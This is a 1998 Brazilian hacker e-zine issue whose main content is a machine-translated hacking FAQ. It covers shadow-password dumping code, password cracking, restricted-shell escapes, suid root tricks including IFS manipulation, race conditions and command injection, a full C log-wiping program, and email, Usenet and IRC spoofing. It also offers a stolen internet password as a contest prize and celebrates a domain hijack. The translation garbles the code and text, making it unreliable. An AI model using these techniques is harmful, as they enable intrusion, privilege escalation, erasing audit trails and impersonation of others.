`$$a ,$$$' `"øü$$' ,$$ü' $$a,. `$$a ,$$$' `ü$$$' `$$üø' "ü$$$sS "øü$$$$$$' `,' `" $$$$$$$' `$ ,$' ` `ü$' $ ` $" `$' ' ; ; ! ; ­ ­ ,$a ­ ,$a $$$ $$$ "$" "$" `$' ______ ______ _______ ___ _______ |i \ | \ | ) | \ ( ) | |\ | |\\ | \\\\\ | |\\ / _ i\\\ | |\\| |\\ | \\\\\| |\\ / /\\ \\\ | ---- |\\ | |\ \\\\| |\\ / /\\_\ \\\ | |\\ | | \ \\\| |\\ / \\\ | __ |\\ | |\ \ \\| |\\ / /---\ \\\ | |\ | |\\ | |\\ \ \| |\\ / /\\ \ \\\ | |\ | |\\ | |\\\ \ |\\ / /\\\\\ \ \\\ | |\\| |\\ | |\\\\ \ |\\ / |\\\\\\ | \\\ |_____i|\\|______|\\ |____)\\\\\\\_____i)\\ (________)\\\\\\\(________)\\ \\\\\\\\\\\\\\\\\\\ \\\\\\\\\\\\\\\\\\\\ \\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\\\\\\\\\\\\\\\\\ \\\\\\\\\\\\\\\\\\\ \\\\\\\\\\\\\\\\\\\\\\\\\\\ Ascii Created by -= [HellReЮ] =- @$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@ [HAckEr'§ Productions 1998] @$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@ ============================================================================= HAcKer§ Productions ©1998 Abril 98 ============================================================================= ============================================================================= H.N.A - revista mensal ( todos dia 01 na BBS mais pr¢xima). Pagina oficial: http:\\www.hacknatio.org Webmasters - HellReЮ - hellred@uol.com.br Ðaniel - wdanielw@rocketmail.com ICQ - UIN'z = 5818377 HellReЮ 8180900 Ðaniel 14:50 03/04/98 - Edicao - Abril 98 ***************************************************************************** ***************************** -.- HAckErs -.- ******************************* ********************************** No.05 ************************************ ***************************************************************************** !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !! ____ ______ _______ ______ !! !! / \ / __ \/ )/ __ \ !! !! | | | ( ) | __| || ( ) | $$$$$$$$$$$$$$$$$ !! !! | | | | | | |(___)| | | | $$$$$$$$$$$$$$$$$ !! !! | |_|_(__) | | | | | | $$$$$$$$$$$$$$$$$ !! !! | \ | \___-)| (__) | $$$$$$$$$ !! !! \_________/___/________|\______/ $$$$$$$ !! !! $$$$$ !! !! A "H.N.A", $$$ !! !! estara promovendo um concurso de Logos. $ !! !! Oq são Logos? São akelas figuras de entarda de Home-Page's, !! !! entaum os amantes de 3DS, 3D Max, 3DStudio, Adobe photo-shop,!! !! Ulead Cool3D, Fractal Desgin.....etc, comecem a fazer o nosso!! !! Logo, é claro que tem que ter o nome nosso né que é ( H.N.A )!! !! Quem quiser dar uma encrementada nele vale tudo.....a Imagem !! !! tem que ser em ( Gif ou Jpg ),..nada de BMP..heheh ;-) !! !! !! !! Agora vc's devem estar-se perguntando: Oq eu ganho com isso? !! !! Muito simples vc ganhara seu NiCk ou Handle se preferirem em !! !! nosso Zine.....Ex: !! !! __________________________________________ !! !! |seu nick,seu nick,seu nick,seu nick, nick | !! !! |s s| !! !! |e e| !! !! |u u| !! !! | | !! !! |n n| !! !! |i i| !! !! |c Nosso E-Zine c| !! !! |k k| !! !! |, ,| !! !! |n n| !! !! |i i| !! !! |c c| !! !! |seu nick,seu nickseu nick,seu nickseu nick| !! !! |__________________________________________| !! !! !! !! !! !! E ai entendeu, é isso mesmo o nosso zine fica no meio como !! !! vc esta lendo agora, ou seja ele fica nas bordas do zine. !! !! Ele ficara estampado em nos 2 ultimos zine's do mes..... !! !! Meu imagina seu nome ( Nick, Handle ) indo num mailist de !! !! quase 50.000 pessoas...putz...vc ficara mais famoso que o !! !! nosso zine....eta sorte hein.....entaum aproveite e naum !! !! demore....faça seu logo agora....e nos envie por e-mail. !! !! !! !! Nosso email é hellred@uol.com.br !! !! !! !! Envie agora e boa sorte........ !! !! !! !! Ps: Envie seu E-mail junto,....pois se ganhar como recebera !! !! o premio...heheh.......ahhhh.....e tb o premio inclue 2 !! !! opções, 1° Uma senha de INTERNET hackeada por mim de 60 hrs, !! !! 2° Membro de nossa associação!! !! !! !! !! Enatum boa sorte e envie já ..... !! !! !! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! -0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0- INDICE: ========= 0- Introdução 1. Como eu tenho acesso o arquivo de contra-senha debaixo de Unix? 2. Como eu racho contra-senhas de Unix? 3. O que está sombreando contra-senha? 4. Onde eu posso achar o arquivo de contra-senha se é sombreado? 5. O que é NIS/yp? 6. O que buscam esses caráteres misteriosos a vírgula em meu arquivo de passwd? 7. Como eu tenho acesso o arquivo de contra-senha debaixo de VMS? 8. Como eu racho contra-senhas de VMS? 9. Como eu fujo de uma concha restringida? 10. Como eu ganho raiz de uma escritura de suid ou programa? 11. Como eu apago minha presença dos troncos de sistemas? 12. Como eu envio fakemail? 13. Como eu finjo postos para UseNet? 14. Como eu corto ChanOp em IRC? 15. Como eu modifico o cliente de IRC para esconder meu real username? -0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0 0- [iNtRODUCAO] We work in the dark We do what we can We give what we have Our doubt is our passion, and our passion is our task The rest is the madness of art. -- Henry James -- Agora sim, o e-zine esta saindo na data certa, sem atrasos! Todo dia 1 do mes o e-zine estara disponivel no site -=H.N.A=- ou em BBS, tambem existem outros sites na internet que distribuem nosso e-zine. E so procurar um pouco! Bom galera tá foda editar o zine cada dia pq agente tá ficando sem matéria mas nós vamos se esforçar!! Entaum quanto mais vcs distribuirem o zine mais a gente fica famoso e mais agente faz o zine, pq pensa bem se vcs naum publicarem o nosso zine vcs concordam que ninguem vai se interessar por ele e ai agente naum vai ficar com saco pra fazer um zine pra ninguem enatum vcs tem que ajudar ok :P *News* : Caras vcs viram oq fizeram com o dominío da Axur05? Hahaha alguém naum vamos dizer quem mas nós recebemos um mail dizendo assim : ------------------------------------------------- Date sent: Tue, 4 Mar 1998 14:38:49 -0600 To: hellred@uol.com.br From: ?????@?????.com Subject: Axur05 LaMMeR'z Hahahahaha E ai caras do mau vcs nem acreditam oq eu fiz no dominío dos caras da Axur..hehe eu entrei nakela merda e mudei o dados pessoais dos cars...hehehe vcs acreditam akeles bostas são do Rio Grande do Sul aonde só da Travecos hahaha...bom pra quem quiser conferir de uma olhada na Internic....hehe falow só deixo meus pesames para eles pois eu sou o $$$The Best$$$. []'s....... ------------------------------------------------- Bom nós da H.N.A nÃo se responsabilizamos por esse delito causado por um rapaz que está meio revoltado por causa da "Axur", lembramdo que se os kras da Axur vierem reclamar com agente eu vou dar um pirulito para eles chorarem pois eu naum tenho nada a ver com essa merda nós só publicamos essa matéria para que os leitores possam saber oq há atras do lado engraçado dos Hacker'z...heheh mas que foi imbecil essse ato foi fala verdade bom enatum até!!! Grato [HellReЮ] -0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0 01. Como eu tenho acesso o arquivo de contra-senha debaixo de Unix? Em Unix standard o arquivo de contra-senha é /etc/passwd. Em um sistema de Unix com NIS/yp ou contra-senha sombrear, muito dos dados de contra-senha possa estar em outro lugar. 02. Como eu racho contra-senhas de Unix? Ao contrário de convicção popular, não podem ser decifradas contra-senhas de Unix. Unix são codificadas contra-senhas com uma uma função de modo. O login programam codifica o texto você entra à " contra-senha ": incite e compara isso codificou fio contra a forma codificada de sua contra-senha. Contra-senha que racha software usa wordlists. Cada palavra no wordlist é codificado e os resultados são comparados à forma codificada do contra-senha designada. O melhor programa rachando para contra-senhas de Unix é atualmente Racha por Alec Muffett. Para PC-DOS, é atualmente o melhor pacote para usar CrackerJack. 03. O que está sombreando contra-senha? Contra-senha sombrear é um sistema de segurança onde a contra-senha codificada campo de /etc/passwd é substituído com uma ficha especial e o contra-senha codificada é armazenada em um arquivo separado que não é legível por usuários de sistema normais. Derrotar contra-senha que sombreia em muitos (mas não tudo) sistemas, escreva um programa que usa chamadas sucessivas para getpwent () obter o arquivo de contra-senha. Exemplo: #include principal () { passwd de struct *p; while(p=getpwent ()) printf (%s:%s:%d:%d:%s:%s:%s\n ", p->pw_name, p->pw_passwd, p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell); } 04. Onde eu posso achar o arquivo de contra-senha se é sombreado? Unix Caminho Ficha ----------------------------------------------------------------- AIX 3 /etc/security/passwd! ou carta de /tcb/auth/files// A/UX 3.0s /tcb/files/auth /? / * BSD4.3-Reno /etc/master.passwd * ConvexOS 10 /etc/shadpw * ConvexOS 11 /etc/shadow * DG/UX /etc/tcb/aa/user / * EP/IX /etc/shadow x HP-UX / .secure/etc/passwd * IRIX 5 /etc/shadow x Linux 1.1 /etc/shadow * OSF/1 /etc/passwd [.dir | .pag] * SCO Unix #.2.x carta de /tcb/auth/files// SunOS4.1+c2 /etc/security/passwd.adjunct ##username SunOS 5.0 /etc/shadow V Release de sistema 4.0 /etc/shadow x V Release de sistema 4.2 /etc/security / * banco de dados Ultrix 4 /etc/auth [.dir | .pag] * UNICOS /etc/udb * 05. O que é NIS/yp? NIS (Sistema de Informação de Cadeia) no nome atual para o que era uma vez conhecido como yp (Páginas Amarelas). O propósito para NIS é permitir muitos máquinas em uma cadeia para compartilhar informação de configuração, incluindo, dados de contra-senha. NIS não é projetado para promover segurança de sistema. Se seu de sistema usa NIS você terá um arquivo de /etc/passwd muito pequeno que inclui uma linha que se parece: +::0:0::: Ver o real uso de arquivo de contra-senha este passwd " de ypcat de comando " 06. O que buscam esses caráter misteriosos a vírgula em meu arquivo de passwd? Os caráter são contra-senha que envelhece dados. Contra-senha que envelhece forças o usuário para mudar contra-senhas depois de um Administrador De sistema especificou período de tempo. Contra-senha envelhecendo também podem forçar um usuário a manter uma contra-senha para um certo número de semanas antes de mudar isto. ] ] Entrada de amostra de /etc/passwd com contra-senha envelhecer instalou: ] ] Will:5fg63fhD3d,M.z8:9406:12:Will Spencer:/home/fsg/will:/bin/bash ] Note a vírgula no campo de contra-senha codificado. Os caráter depois de a vírgula é usada pela contra-senha que envelhece mecanismo. ] ] Contra-senha que envelhece caráter de sobre exemplo: ] ] M.z8 ] Os quatro caráter são interpretados como segue: 1: Número de máximo de semanas que uma contra-senha pode ser usada sem mudar. 2: Número mínimo de semanas que uma contra-senha deve ser usada antes de mudar. 3&4: última contra-senha de tempo foi mudada, em número de semanas desde 1970. Deveriam ser notados três casos especiais: Se os primeiro e segundos caráter são fixados '.. ' o usuário será forçado a mudar passwd de his/her o da próxima vez he/she anota em. O programa de passwd removerá o passwd que envelhece caráter então, e o usuário não será sujeitado a contra-senha que envelhece exigências novamente. Se o terço e quartos caráter são fixados '.. ' o usuário será forçado a mudar passwd de his/her o da próxima vez he/she anota em. Contra-senha envelhecendo acontecerão então como definiu pelos primeiro e segundos caráter. Se o primeiro caráter (MAX) é menos que o segundo caráter (MIN), o usuário não é permitido mudar contra-senha de his/her. Só lata de raiz mudança que contra-senha de usuários. Também deveria ser notado que o comando de su não confere a contra-senha envelhecendo dados. Uma conta com uma contra-senha expirada pode ser su para sem ser forçado a mudar a contra-senha. Contra-senha que Envelhece Códigos +------------------------------------------------------------------------+ | | | Caráter: . / 0 1 2 3 4 5 6 7 8 9 um B C D E F G H | | Número: 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 | | | | Caráter: Eu J K L M N O P Q R S T U V W X Y Z um b | | Número: 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 | | | | Caráter: c d e f g h i j k l m n o p q r s t u v | | Número: 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 | | | | Caráter: w x y z | | Número: 60 61 62 63 | | | +------------------------------------------------------------------------+ 07. Como eu tenho acesso o arquivo de contra-senha debaixo de VMS? Debaixo de VMS, o arquivo de contra-senha é SYS$SYSTEM:SYSUAF.DAT. Porém, Unix distinto, a maioria dos usuários não tem acesso para ler o arquivo de contra-senha. 08. Como eu racho contra-senhas de VMS? Escreva um programa que usa o SYS$GETUAF funciona para comparar o resultados de palavras codificadas contra os dados codificados em SYSUAF.DAT. São conhecidos dois tais programas para existir, CHECK_PASSWORD e GUESS_PASSWORD. 09. Como eu fujo de uma concha restringida? Em conchas restringidas implementadas mal você pode quebrar fora do ambiente restringido correndo um programa que caracteriza uma concha função. Um exemplo bom é vi. Corra vi e use este comando: Shell=/bin/sh de :set então concha que usa este comando: :shell 10. Como eu ganho raiz de uma escritura de suid ou programa? 1. mudança IFS. Se o programa chama qualquer outro programa que usa o sistema () função chame, você pode poder enganar isto mudando IFS. IFS é o Interno Separador de campo que a concha usa para delimitar argumentos. Se o programa contém uma linha que se parece: sistema (/bin/date ") e você muda IFS para ' / ' a concha os vai interprete o linha procedendo como: data de caixa Agora, se você tem um programa de seu próprio no caminho chamada " caixa " o programa de suid correrá seu programa em vez de /bin/date. Mudar IFS, use este comando: IFS = ' / ' ;export IFS #Concha de Bourne setenv IFS ' / ' #Concha de C exporte IFS = ' / ' #Concha de Korn 2. vínculo a escritura para -i Crie um vínculo simbólico nomeado " -i " para o programa. Correndo " -i " cause a concha de intérprete (/bin/sh) começar para cima em interativo modo. Isto só trabalha em suid descasque escrituras. Exemplo: % ln suid.sh -i % -i # 3. explore uma condição de raça Substitua um vínculo simbólico ao programa com outro programa enquanto o núcleo está carregando /bin/sh. Exemplo: -19 suidprog agradável; ln -s evilprog suidroot 4. envia ruim introduza ao programa. Invoque o nome do programa e um comando separado no mesmo linha de comando. Exemplo: suidprog; id 11. Como eu apago minha presença dos troncos de sistemas? Edite /etc/utmp, /usr/adm/wtmp e /usr/adm/lastlog. Estes não são nenhum texto arquivos que podem ser editados à mão com vi, você tem que usar um programa especificamente escrito para este propósito. Exemplo: #include #include #include #include #include #include #include #include #define WTMP_NAME " /usr/adm/wtmp " #define UTMP_NAME " /etc/utmp " #define LASTLOG_NAME " /usr/adm/lastlog " int f; kill_utmp(who nulo) chamusque *who; { utmp_ent de utmp de struct; se ((f=open(UTMP_NAME,O_RDWR)) >=0) { while(read (f, &utmp_ent, sizeof (utmp_ent))> 0) se (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *) &utmp_ent,sizeof (utmp_ent)); lseek (f, - (sizeof (utmp_ent)), SEEK_CUR); escreva (f, &utmp_ent, sizeof (utmp_ent)); } close(f); } } kill_wtmp(who nulo) chamusque *who; { utmp_ent de utmp de struct; pos longo; pos = 1L; se ((f=open(WTMP_NAME,O_RDWR)) >=0) { while(pos != -1L) { lseek(f,-(long) ((utmp de sizeof(struct)) * pos),L_XTND); se (leia (f, &utmp_ent, sizeof (utmp de struct)) <0) { pos = -1L; } outro { se (!strncmp(utmp_ent.ut_name,who,strlen(who))) { bzero((char *) utmp de &utmp_ent,sizeof(struct)); lseek(f, - ((utmp de sizeof(struct)) * pos),L_XTND); escreva (f, &utmp_ent, sizeof (utmp_ent)); pos = -1L; } outro pos + = 1L; } } close(f); } } kill_lastlog(who nulo) chamusque *who; { passwd de struct *pwd; newll de lastlog de struct; se ((pwd=getpwnam(who)) !=NULL) { se ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) { lseek(f, (long)pwd->pw_uid * sizeof (lastlog de struct), 0); bzero((char *) &newll,sizeof (newll)); write(f, (chamusque *) &newll, sizeof (newll)); close(f); } } outro printf (" %s:? \n",who); } main(argc,argv) argc de int; chamusque *argv []; { se (argc==2) { kill_lastlog(argv[1]); kill_wtmp(argv[1]); kill_utmp(argv[1]); printf (Zap2!\n "); } outro printf (" Erro. \n "); } 12. Como eu envio fakemail? Telnet para aportar 25 da máquina você quer o correio para aparecer origine de. Entre em sua mensagem como neste exemplo: HELO bellcore.com REMETA FROM:Voyager@bellcore.com RCPT TO:president@whitehouse.gov DADOS Por favor descontinue sua iniciativa de Cortador tola. . DEIXE Em sistemas que têm RFC 931 implementados, spoofing seu " CORREIO DE ": linha não trabalhará. Teste se enviando primeiro fakemail. Para mais informationm RFC leu 822 " Padrão para o formato de ARPA Internet texto mensagens ". 13. Como eu finjo postos para UseNet? Use inews para postar. Dê para inews as linhas seguintes: De: Newsgroups: Assunto: Mensagem-ID: Data: Organização: Para um newsgroup moderado, inews requererão também esta linha: Aprovado: Então some seu posto e termine com . Exemplo: De: Eric S. Real Newsgroups: alt.hackers Assunto: Grupo patético de perdedores de wannabe Mensagem-ID: Data: Fri, 13 1994 12:15:03 de agosto, Organização: Maioria moral Um grupo patético de perdedores de wannabe é o que a maioria de você é, sem corrija para roubar o título honrado de `Hacker ' inchar seu tolo egos adolescentes. É enchido, se perca, e vai encarcerar. Eric S. Real ^D Note aquele muitos sistemas juntarão um Originador: enfileire a sua mensagem header, revelando a conta da qual a mensagem era efetivamente, postado. 14. Como eu corto ChanOp em IRC? Ache um servidor que é fendido do resto de IRC e cria seu próprio encane usando o nome do canal lá você quer ChanOp em. Quando aquele servidor reconecta à rede, você terá ChanOp na realidade canal. Se você tem ServerOp em um servidor, você pode causar isto para dividir de propósito. 15. Como eu modifico o cliente de IRC para esconder meu real username? Obtenha o cliente de IRC de cs.bu.edu /irc/clients. Olhar à fonte código arquiva irc.c e ctcp.c. O código para o que você está olhando é razoavelmente fácil manchar. Mude. Mude o username codificam em irc.c e o código de informação de ctcp em ctcp.c. Compile e corra seu cliente. Aqui está o diffs de uma amostra corte do cliente de IRC. Seu cliente código variará e dependerá ligeiramente de que IRC cliente versão você é correndo. * * * ctcp.c.old Wed 10 10:08:05 1993 de fevereiro --- ctcp.c Fri 12 04:33:55 1993 de fevereiro * * * * * * * * * * * * * * * * * * 331,337 * * * * passwd de struct *pwd; diff longo; uid de int; ! chamusque c; / * * sojge reclamaram aquele ircII diz ' 1 segundos inativos --- 331,337---- passwd de struct *pwd; diff longo; uid de int; ! chamusque c, *fing,; / * * sojge reclamaram aquele ircII diz ' 1 segundos inativos * * * * * * * * * * * * * * * * * * 348,354 * * * * se (uid != DAEMON_UID) { #endif / * DAEMON_UID * / ! se (pwd = getpwuid(uid)) { chamusque *tmp; --- 348,356---- se (uid != DAEMON_UID) { #endif / * DAEMON_UID * / ! se (fing = getenv (IRCFINGER ")) ! send_ctcp_reply(from, ctcp->name, fing, diff, c); ! outro se (pwd = getpwuid(uid)) { chamusque *tmp; * * * irc.c.old Wed 10 06:33:11 1993 de fevereiro --- irc.c Fri 12 04:02:11 1993 de fevereiro * * * * * * * * * * * * * * * * * * 510,516 * * * * malloc_strcpy(&my_path," /"); se (*realname == null(char)) strmcpy(realname, " *Unknown *", REALNAME_LEN); ! se (*username == null(char)) { se (ptr = getenv (o USUÁRIO ")) strmcpy(username, ptr, NAME_LEN); --- 510,518---- malloc_strcpy(&my_path," /"); se (*realname == null(char)) strmcpy(realname, " *Unknown *", REALNAME_LEN); ! se (ptr = getenv (IRCUSER ")) ! strmcpy(username, ptr, NAME_LEN); ! outro se (*username == null(char)) { se (ptr = getenv (o USUÁRIO ")) strmcpy(username, ptr, NAME_LEN); -0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0- |Editores| HellRed® Ðaniel ======================================================================= Hackers Productions 1998 ======================================================================= Abril 98 ======================================================================= =======================================================================